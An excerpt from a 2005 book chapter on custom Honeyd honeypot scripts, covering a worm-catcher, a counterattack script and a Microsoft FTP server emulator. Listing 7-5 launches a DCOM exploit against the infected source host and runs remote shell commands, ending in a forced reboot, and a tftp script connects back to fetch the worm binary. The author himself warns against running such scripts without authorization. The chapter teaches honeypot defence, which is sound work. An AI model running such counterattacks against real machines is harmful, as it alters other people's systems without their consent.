Custom Scripts

		Chapter 7 - Honeyd Service Scripts Honeypots for Windows by Roger A. Grimes Apress 2005

Creating custom service scripts extends the functionality of Honeyd. The first two examples shown here are simple scripts created from scratch to do some interesting things. The third example borrows code from one of the existing default Honeyd scripts and customizes it extensively.

A Worm Catcher Script

Honeypots are a great way to catch Internet worms. You can set up listening ports to document how popular a particular worm is, or even create a script to catch the malware. Several people, including Laurent Oudot of the Rstack team (http://www.rstack.org) used Honeyd to catch the MSBlaster worm (http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html) when it was causing damage around the world. The basic concept was to open TCP port 135—the port the worm was looking for—and then trick the malware into downloading itself. Step 1 was accomplished by adding the following line to the Honeyd.config file:

 add <template> tcp port 135 open 

The MSBlaster worm, finding this port open, would then attempt a DCOM RPC buffer overflow. On a real host, if the buffer overflow were successful, the worm would then establish a connection on TCP port 4444 and download itself using TFTP on TCP port 69.

In order to capture the worm, Honeyd was used to create a capturing service shell script on port 4444. This was done with a Honeyd configuration command similar to this:

 add <template> tcp port 4444 "c:\Honeyd\scripts\sh scripts\msblaster.sh $ipsrc  $ipdst" 

The Msblaster.sh script was then used to connect to the source, as follows:

 # we connect via tftp to the attacker  # and we get the msblast.exe file  tftp $1 << EOF  get msblast.exe  quit  EOF 

The script will use Tftp.exe (located in \System32 on most Windows machines) to download the Msblaster.exe worm executable where it can be examined. See Dr. Provos’s MSBlaster worm document (http://www.citi.umich.edu/u/provos/honeyd/msblast.html) or Mr. Oudot’s excellent article (http://www.securityfocus.com/infocus/1740) for more details. You can use similar scripts and actions to capture most scanning Internet worms.

An Offensive Response Script

Sometimes, simply capturing the worm isn’t enough. Both MSBlaster capturing script articles mentioned in the previous section contain a counterattack script that was used by some administrators to stop the onslaught of the MSBlaster worm. MSBlaster worked against only unpatched Windows computers. Microsoft and several other Internet security agencies broadcast several alerts, warning Windows users to patch their machines. Unfortunately, the masses either didn’t get the warnings or ignored them. When the MSBlaster worm was released, it successfully infected hundreds of thousands of machines. Because the MSBlaster worm randomly generated IP addresses to scan, even if your network was fully patched, MSBlaster could have caused it to slow down because of the other exploited computers.

Some honeypot administrators wrote a service command-line script (see Listing 7-5) that when connected to, would connect back to the originating host, kill the MSBlaster worm process, clean up a malicious Registry entry (using a created on-the-fly Registry edit file), and reboot the machine.

Listing 7.5: Script Used to Clean MSBlaster Worm from Originating Hosts

 # Launches a DCOM exploit toward the infected attacking host  # and then run cleaning commands in the remote DOS shell obtained  ./dcom_exploit -d $1 << EOF  REM Executes the following orders on the host :  REM 1) Kill the running process MSBlast.exe  taskkill /f /im msblast.exe /t  REM 2) Eliminate the binary of the worm  del /f %SystemRoot%\system32\msblast.exe  REM 3) Clean the registry  echo Regedit4 > c: \cleanerMSB.reg  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\  CurrentVersion\Run]  >> c:\cleanerMSB.reg  echo "auto windows update" = "REM msblast.exe" >> c: \cleanerMSB.reg  regedit /s c: \cleanerMSB.reg  del /f c:\cleanerMSB.reg  REM N) Specific actions to update the Windows host could be added here  REM N+1) Reboot the host  shutdown -r -f -t 0 exit  EOF 

You should be aware that offensive scripts like the one shown in Listing 7-5 are on shaky ground when run unauthorized against computers and networks. You would think that removing a worm would always be a good thing, but worm cleaners have a way of causing as many or more problems than the disease.

For example, a kindhearted soul created another worm, called Welchia (http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.worm.html) that did nearly the same thing as the script in Listing 7-5. It would connect to vulnerable hosts, remove the MSBlaster worm, and download the Microsoft patch needed to close the vulnerability.While the MSBlaster worm was only a problem for a few days, the Welchia worm was inadvertently bringing down networks for weeks. Its coder had not put a bandwidth-throttling mechanism in place, and the worm was just as ferocious as the original worm. Add to the massive network delays caused by patch downloading and installing, and Welchia proved to be much worse than the worm it was curing.

It is always a bad idea, even if with good intentions, to modify other people’s computers without their knowledge.

Microsoft FTP Server

This next example demonstrates how you can borrow an existing script and heavily customize it. In this case, the resulting custom script creates a realistic Microsoft FTP server. The first task is to find an existing script that contains FTP server behavior and commands. For this example, I opened the Honeyd.tar file (http://www.honeyd.org/contrib.php), which contains dozens of scripts, including (it claims) a Microsoft FTP server. I located the Microsoft FTP server section by searching for SERVICE="MSFTP/FTP. Then I copied the whole section of related code to a separate file that I called Ms-ftp.sh.

Upon reviewing the script, I discovered that it more closely resembled a Unix FTP server than a Microsoft version. Therefore, I needed to heavily modify the file to represent an actual Microsoft FTP server. I spent about two hours documenting the behaviors of a real Microsoft FTP server on Windows Server 2003. I then modified the script file to mimic a Microsoft FTP server, as shown in Listing 7-6. You can download this script from the Downloads section of the Apress web site (http://www.apress.com).

Listing 7.6: Ms-ftp.sh Script File Mimicking a Microsoft FTP Server

 SRCIP=$1  SRCPORT=$2  DSTIP=$3  DSTPORT=$4  SERVICE="MSFTP/FTP"  HOST="ftp.banneretcs.com"  AUTH="no"  PASS="no"  DATFILES="ftpfiles"  LOG=ftp.log  pwd="/"  passive=0  #dataport=1234  dataport=$[$SRCPORT+1]  type="ASCII"  mode="S"  echo -e "220 $HOST Microsoft FTP Service"  while read incmd parm1 parm2 parm3 parm4 parm5  do       # remove control characters          incmd=`echo $incmd | ssed s/[[:cntrl:]]//g`          parm1=`echo $parm1 | ssed s/[[:cntrl:]]//g`          parm2=`echo $parm2 | ssed s/[[:cntrl:]]//g`          parm3=`echo $parm3 | ssed s/[[:cntrl:]]//g`          parm4=`echo $parm4 | ssed s/[[:cntrl:]]//g`          parm5=`echo $parm5 | ssed s/[[:cntrl:]]//g`      # convert to uppercase         incmd_nocase=`echo $incmd | gawk '{print toupper($0);}'`      #echo $incmd_nocase      # log user input      echo "$incmd $parm1 $parm2 $parm3 $parm4 $parm5" >> $LOG      # check for login         if $AUTH == "no"         then             if "$incmd_nocase" != "USER"             then                 if "$incmd_nocase" != "QUIT"               then                     echo -e "User ($SRCIP:(none)):"               continue           fi          fi      fi      # parse commands      case $incmd_nocase in          QUIT* )                echo -e "221 \r"           ;;          HELP* )                         echo -e "Commands may be abbreviated. Commands are:"                         echo -e " "                         echo -e "!      delete     literal   prompt     send"                         echo -e "?      debug      ls        put        status"                         echo -e "append dir        mdelete   pwd        trace "                         echo -e "ascii  disconnect mdir      quit       type"                         echo -e "bell   get        mget      quote      user"                         echo -e "binary glob       mkdir     recv       verbose"                         echo -e "bye    hash       mls       remotehelp"                         echo -e "cd     help       mput      rename"                         echo -e "close  lcd        open      rmdir"                         echo -e "ftp>"           ;;          USER* )      parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'`      if [ "$parm1_nocase" == "ANONYMOUS" ]; then      echo -e "331 Anonymous access allowed, send identity  (e-mail name) as password.\r"                 AUTH="ANONYMOUS"                else                            echo -e "331 Password required for $parm1."                            echo -e "Password: "             AUTH=$parm1                 fi            ;;           PASS* )              PASS=$parm1                          if "$AUTH" == "ANONYMOUS" ; then  rand=`head -c 4 /dev/urandom | hexdump | ssed -e 's/[0 a-z]//g' | head -c 2`                     echo -e "230 Anonymous user logged in.\r"                 else                   echo -e "530 Login incorrect.\r"                 fi            ;;              MDIR* )  if [ `echo "$parm1" | grep ^/ >/dev/null && echo 1` ]; then  if `cat $DATFILES | ssed -e 's!/.*/$!/!' | grep "$parm1.*\[.*w.*\]" 2>&1 >/dev/null  && echo 1`; then  echo -e "257 \"$parm1\" new directory created.\r"  echo -e "$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES       else  echo -e "550 $parm1: Permission denied.\r"       fi       else  if  `grep "$pwd.*\.*w.*\" $DATFILES 2>&1 >/dev/null && echo 1` ; then  echo -e "257 \"$pwd/$parm1\" new directory created.\r"  echo -e "$pwd/$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES            else            echo -e "550 $parm1: Permission denied.\r"            fi            fi            ;;                  RMD* )  if [ `echo "$parm1" | grep ^/ >/dev/null && echo 1` ]; then  if [ `cat $DATFILES | ssed -e 's!/.*/$!/!' | grep "$parm1.*\[.*w.*\]" 2>&1  >/dev/null && echo 1` ]; then  echo -e "257 \"$parm1\" directory deleted.\r"  #echo -e "$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES            else  echo -e "550 $parm1: Permission denied.\r"       fi  else  if [ `grep "$pwd.*\[.*w.*\]" $DATFILES 2>&1 >/dev/null && echo 1` ]; then  echo -e "257 \"$pwd/$parm1\" directory deleted.\r"  #echo -e "$pwd/$parm1/\t[drwx]" | ssed 's!//*!/!g' >> $DATFILES            else            echo -e "550 $parm1: Permission denied.\r"            fi       fi       ;;       PWD* )       echo -e "257 \"$pwd\" is current directory.\r"            ;;                  LS* )       if [ `grep "$parm1" $DATFILES 2>&1 >/dev/null && echo 1` ]; then       if [ `grep "$pwd/$parm1.*\[.*r.*\]" $DATFILES 2>&1 >/dev/null && echo   1` ]; then       echo -e "150 Opening ASCII mode data connection for /bin/ls.\r"  if $passive -eq 1; then       #echo -e "hallo\r" | nc -w 1 -l -p $dataport  sleep 6  echo -e "425 Can't build data connection: Connection Timeout\r"  else  mode data connection for file list.\r"  echo -e "425 Can't build data connection: Connection refused\r"       fi       else  echo -e "550 $parm1: Permission denied.\r"       fi       else       echo -e "550 $parm1: No such file or directory\r"       fi       ;;  PASV* )  echo -e "227 Entering Passive Mode (192,168,1,2,165,53)\r"  passive=1  dataport=42293  ;;  TYPE*)  echo -e "200 Type set to $parm1.\r"  type=$parm1  ;;  STAT* )  echo -e "Connected to $HOST.$DOMAIN\r"  echo -e "Type: $type, Verbose: On ; Bell: Off ; Prompting: On ; Globbing: On "  echo -e "Debugging: Off ; Hash mark printing: Off "  echo -e "FTP> "  ;;      * )  echo -e "500 '$incmd': command not understood.\r"  ;;  esac  done 

When someone connects to the FTP server, it behaves like a real FTP server, as shown in Figure 7-2, including allowing anonymous connections. Typed-in commands are saved to a log file called ftp.log for later review.

Figure 7-2: Ms-ftp.sh script emulating a Microsoft FTP server

The modifications required to adapt the original Unix version for the Windows version were significant. First on the agenda was reviewing the output of the Help command. I needed to rebuild the Help command output to reflect the commands supported by the Microsoft server, and then make sure each command was handled by the script file in a separate routine. I ran each command on the Microsoft server, and documented its response to successful syntax and errors. I updated the script coding to reflect what I learned. Second, I created an FTP files directory that can be used in the script file during the anonymous login. I placed harmless, but interesting looking, files in the FTP folder.

Complicating this particular script was its reliance on a few Unix-style utilities: grep, gawk, and sed. These utilities are used to query for and extract text from various commands. I was able to find grep in Cygwin, and the other two had Windows versions available.

I downloaded the Windows version of gawk from http://gnuwin32.sourceforge.net/packages/gawk.htm. Make sure to download the binary and dependency zip files. Unzip their contents and place into the same directory as your scripts.

I downloaded a Windows version of sed from http://www.cornerstonemag.com/sed. The ported version of sed is executed using a file called Ssed.exe. I modified the script file, finding every instance of sed and renaming it Ssed.exe using Notepad’s search and replace feature, so the correct Windows version of sed would be executed.

I then tested the functionality indicated in the script file on each command separately outside the larger script. All in all, the FTP script example involved hours of work, including testing and debugging.

As you can see, scripts come in all sorts of flavors, from simple to advanced.